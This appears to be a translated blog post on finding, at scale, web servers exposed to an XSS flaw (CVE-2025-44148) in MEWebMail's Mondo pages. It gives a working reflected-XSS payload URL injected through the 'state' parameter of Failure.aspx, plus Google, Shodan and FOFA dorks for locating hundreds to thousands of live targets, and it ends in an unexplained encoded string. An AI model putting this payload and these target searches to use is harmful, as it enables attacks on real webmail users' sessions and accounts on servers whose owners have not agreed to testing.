XSS大规模挖掘:CVE-2025-44148
Google + Shodan + FOFA + ZoomEye Dorking
作者:Abhirup Konwar 2025年8月24日
1️⃣ Google Dorking
inurl:/Mondo/lang/sys
然后,只需在下方端点后追加XSS载荷,将其设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”。
/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22
(按回车或点击查看完整尺寸图片)
2️⃣ Shodan Dorking
(200+ 条结果)
http.html:"/MEWebMail/Mondo"
目标过滤
http.html:"/MEWebMail/Mondo" hostname:target.com
http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com
2个重要的切面分析:
- Domain
- ssl.cert.subject.cn
(按回车或点击查看完整尺寸图片)
3️⃣ FOFA Dorking
(2000+ 条结果)
body="/MEWebMail/Mondo"
(按回车或点击查看完整尺寸图片) CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=
